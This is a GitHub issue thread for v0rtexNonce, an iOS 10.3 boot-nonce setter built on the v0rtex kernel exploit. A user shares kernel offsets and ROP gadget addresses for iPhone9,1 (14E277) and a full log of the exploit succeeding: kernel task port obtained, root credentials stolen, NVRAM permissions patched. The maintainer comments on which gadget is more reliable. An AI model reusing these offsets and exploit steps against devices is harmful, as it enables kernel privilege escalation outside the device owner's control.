search

arx8x / v0rtexNonce

set generator for iOS 10.3 with v0rtex exploit by siguza
73 stars 27 forks source link

IPhone 9,1 Success with those offset #41

Closed heywong1123 closed 6 years ago

heywong1123 commented 6 years ago 
    // 10.3
    if(!strcmp(osversion, "14E277"))
    {
        OFFSET_ZONE_MAP                        = 0xfffffff007590478;
        OFFSET_KERNEL_MAP                      = 0xfffffff0075ec050;
        OFFSET_KERNEL_TASK                     = 0xfffffff0075ec048;
        OFFSET_REALHOST                        = 0xfffffff007572ba0;
        OFFSET_BZERO                           = 0xfffffff0070c1f80;
        OFFSET_BCOPY                           = 0xfffffff0070c1dc0;
        OFFSET_COPYIN                          = 0xfffffff0071c6134;
        OFFSET_COPYOUT                         = 0xfffffff0071c6414;
        OFFSET_ROOTVNODE                       = 0xfffffff0075ec0b0;
        OFFSET_CHGPROCCNT                      = 0xfffffff007049e4b;
        OFFSET_KAUTH_CRED_REF                  = 0xfffffff0073ada04;
        OFFSET_IPC_PORT_ALLOC_SPECIAL          = 0xfffffff0070df05c;
        OFFSET_IPC_KOBJECT_SET                 = 0xfffffff0070f22b4;
        OFFSET_IPC_PORT_MAKE_SEND              = 0xfffffff0070deb80;
        OFFSET_IOSURFACEROOTUSERCLIENT_VTAB    = 0xfffffff006e4a238;
        OFFSET_ROP_ADD_X0_X0_0x10              = 0xfffffff0064ff0a8;
        OFFSET_ROP_LDR_X0_X0_0x10              = 0xfffffff0074cf02c;

Xcode log here:

2017-12-27 16:29:01.025855+0800 v0rtexNonce[267:6431] uid isn't 0 2017-12-27 16:29:01.027649+0800 v0rtexNonce[267:6431] Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:55 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T8010 2017-12-27 16:29:01.027672+0800 v0rtexNonce[267:6431] loading offsets for iPhone9,1 - 14E277 2017-12-27 16:29:01.027680+0800 v0rtexNonce[267:6431] test offset x0x0x10gadget: fffffff0064ff0a8 2017-12-27 16:29:01.027734+0800 v0rtexNonce[267:6431] service: 630b 2017-12-27 16:29:01.027792+0800 v0rtexNonce[267:6431] client: 640b, (os/kern) successful 2017-12-27 16:29:01.027895+0800 v0rtexNonce[267:6431] newSurface: (os/kern) successful 2017-12-27 16:29:01.027922+0800 v0rtexNonce[267:6431] realport: 6503, (os/kern) successful 2017-12-27 16:29:01.031396+0800 v0rtexNonce[267:6431] port: 106603 2017-12-27 16:29:01.031431+0800 v0rtexNonce[267:6431] mach_port_insert_right: (os/kern) successful 2017-12-27 16:29:01.031449+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful 2017-12-27 16:29:01.031466+0800 v0rtexNonce[267:6431] herp derp 2017-12-27 16:29:01.132553+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful 2017-12-27 16:29:01.329300+0800 v0rtexNonce[267:6431] mach_port_get_context: 0x300000a400000011, (os/kern) successful 2017-12-27 16:29:01.329513+0800 v0rtexNonce[267:6431] reallocate_buf: (os/kern) successful 2017-12-27 16:29:01.329565+0800 v0rtexNonce[267:6431] mach_port_request_notification(realport): 0, (os/kern) successful 2017-12-27 16:29:01.329604+0800 v0rtexNonce[267:6431] getValue(164): 0x1010 bytes, (os/kern) successful 2017-12-27 16:29:01.329615+0800 v0rtexNonce[267:6431] realport addr: 0xffffffe0057593b0 2017-12-27 16:29:01.329638+0800 v0rtexNonce[267:6431] mach_port_request_notification(fakeport): 6607, (os/kern) successful 2017-12-27 16:29:01.329670+0800 v0rtexNonce[267:6431] getValue(164): 0x1010 bytes, (os/kern) successful 2017-12-27 16:29:01.329679+0800 v0rtexNonce[267:6431] fakeport addr: 0xffffffe003db6370 2017-12-27 16:29:01.329757+0800 v0rtexNonce[267:6431] reallocate_buf: (os/kern) successful 2017-12-27 16:29:01.329790+0800 v0rtexNonce[267:6431] itk_space: 0xffffffe000768798 2017-12-27 16:29:01.329805+0800 v0rtexNonce[267:6431] self_task: 0xffffffe0059acff0 2017-12-27 16:29:01.329818+0800 v0rtexNonce[267:6431] IOSurfaceRootUserClient port: 0xffffffe005758b28 2017-12-27 16:29:01.329832+0800 v0rtexNonce[267:6431] IOSurfaceRootUserClient addr: 0xffffffe0059e4e00 2017-12-27 16:29:01.329895+0800 v0rtexNonce[267:6431] IOSurfaceRootUserClient vtab: 0xfffffff008e4a238 2017-12-27 16:29:01.329904+0800 v0rtexNonce[267:6431] slide: 0x0000000002000000 2017-12-27 16:29:01.329925+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful 2017-12-27 16:29:01.329940+0800 v0rtexNonce[267:6431] zone_map: 0xfffffff106465d60 2017-12-27 16:29:01.331448+0800 v0rtexNonce[267:6431] reallocate_buf: (os/kern) successful 2017-12-27 16:29:01.331475+0800 v0rtexNonce[267:6431] mach_vm_remap: (os/kern) successful 2017-12-27 16:29:01.331482+0800 v0rtexNonce[267:6431] shmem_addr: 0x00000001005c2000 2017-12-27 16:29:01.331489+0800 v0rtexNonce[267:6431] vtab addr: 0xffffffe003db6418 2017-12-27 16:29:01.331503+0800 v0rtexNonce[267:6431] fakeobj addr: 0xffffffe003db6000 2017-12-27 16:29:01.331514+0800 v0rtexNonce[267:6431] kernel_task addr: 0xffffffe0007aefd0, success 2017-12-27 16:29:01.331522+0800 v0rtexNonce[267:6431] kernproc addr: 0xfffffff0095e5478, success 2017-12-27 16:29:01.331529+0800 v0rtexNonce[267:6431] kern_ucred: 0xffffffe0009c5a70, success 2017-12-27 16:29:01.331537+0800 v0rtexNonce[267:6431] self_proc: 0xffffffe005751020, success 2017-12-27 16:29:01.331544+0800 v0rtexNonce[267:6431] self_ucred: 0xffffffe0009c67f0, success 2017-12-27 16:29:01.331551+0800 v0rtexNonce[267:6431] stole the kernel's cr_label 2017-12-27 16:29:01.331572+0800 v0rtexNonce[267:6431] uid: 0 2017-12-27 16:29:01.331579+0800 v0rtexNonce[267:6431] realhost: 6707 (host: a03) 2017-12-27 16:29:01.331585+0800 v0rtexNonce[267:6431] zm_task addr: 0xffffffe003db60a0 2017-12-27 16:29:01.331592+0800 v0rtexNonce[267:6431] km_task addr: 0xffffffe003db6180 2017-12-27 16:29:01.331599+0800 v0rtexNonce[267:6431] kernel_map: 0xfffffff106465c40, success 2017-12-27 16:29:01.331605+0800 v0rtexNonce[267:6431] ipc_space_kernel: 0xffffffe00076a208, success 2017-12-27 16:29:01.331612+0800 v0rtexNonce[267:6431] zm_range: 0xffffffe0006bc000-0xffffffe0186bc000, success 2017-12-27 16:29:01.331620+0800 v0rtexNonce[267:6431] zm_port addr: 0xffffffe0041a75d0 2017-12-27 16:29:01.331656+0800 v0rtexNonce[267:6431] km_port addr: 0xffffffe0041a7918 2017-12-27 16:29:01.331691+0800 v0rtexNonce[267:6431] copyin: success 2017-12-27 16:29:01.331740+0800 v0rtexNonce[267:6431] mach_ports_lookup: (os/kern) successful 2017-12-27 16:29:01.331763+0800 v0rtexNonce[267:6431] zone_map port: 6807 2017-12-27 16:29:01.331770+0800 v0rtexNonce[267:6431] kernel_map port: 6907 2017-12-27 16:29:01.331788+0800 v0rtexNonce[267:6431] mach_ports_register: (os/kern) successful 2017-12-27 16:29:01.331798+0800 v0rtexNonce[267:6431] mach_vm_remap: (os/kern) successful 2017-12-27 16:29:01.331815+0800 v0rtexNonce[267:6431] remap_addr: 0xffffffe000002fd0 2017-12-27 16:29:01.331833+0800 v0rtexNonce[267:6431] mach_vm_wire: (os/kern) successful 2017-12-27 16:29:01.331840+0800 v0rtexNonce[267:6431] newport: 0xffffffe0041a5848 2017-12-27 16:29:01.331856+0800 v0rtexNonce[267:6431] copyin: success 2017-12-27 16:29:01.331872+0800 v0rtexNonce[267:6431] kernel_task: 6a07, (os/kern) successful 2017-12-27 16:29:01.338075+0800 v0rtexNonce[267:6431] kernel_task: 0x6a07 2017-12-27 16:29:01.338121+0800 v0rtexNonce[267:6431] Reading kernel header... 2017-12-27 16:29:01.338151+0800 v0rtexNonce[267:6431] Found TEXT.cstring section at 0xfffffff00901f7d8 2017-12-27 16:29:01.338403+0800 v0rtexNonce[267:6431] Found DATA.data section at 0xfffffff00953c000 2017-12-27 16:29:01.338954+0800 v0rtexNonce[267:6431] Found string "little-endian?" at 0xfffffff00905bc4f 2017-12-27 16:29:01.339044+0800 v0rtexNonce[267:6431] Found gOFVariables at 0xfffffff00956b6b0 2017-12-27 16:29:01.339075+0800 v0rtexNonce[267:6431] Successfully patched permissions for variable "com.apple.System.boot-nonce" 2017-12-27 16:29:01.339186+0800 v0rtexNonce[267:6431] Reading var failed 2017-12-27 16:29:01.339242+0800 v0rtexNonce[267:6431] current generator: 2017-12-27 16:30:06.163171+0800 v0rtexNonce[267:6431] [MC] System group container for systemgroup.com.apple.configurationprofiles path is /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles 2017-12-27 16:30:06.164059+0800 v0rtexNonce[267:6431] [MC] Reading from private effective user settings. 2017-12-27 16:30:07.111000+0800 v0rtexNonce[267:6431] [App] if we're in the real pre-commit handler we can't actually add any new fences due to CA restriction 2017-12-27 16:30:21.557737+0800 v0rtexNonce[267:6914] Unable to setup extension context - error: Couldn’t communicate with a helper application. regenerated 0xfca4b45e3a9134e3 generator to set : 0xfca4b45e3a9134e3 2017-12-27 16:30:51.679855+0800 v0rtexNonce[267:6431] IORegistryEntrySetCFProperties: (os/kern) successful 2017-12-27 16:30:51.679896+0800 v0rtexNonce[267:6431] generator set 2017-12-27 16:30:51.691203+0800 v0rtexNonce[267:6431] current generator: 0xfca4b45e3a9134e3

arx8x commented 6 years ago

Every required offset is the same except for addx0x0x10 gadget. Any of those ROP gadgets should work. You're getting the second one, the project has the first one. But from my experience, the second works more reliably. The first one never worked on my iPhone 6s Thank you.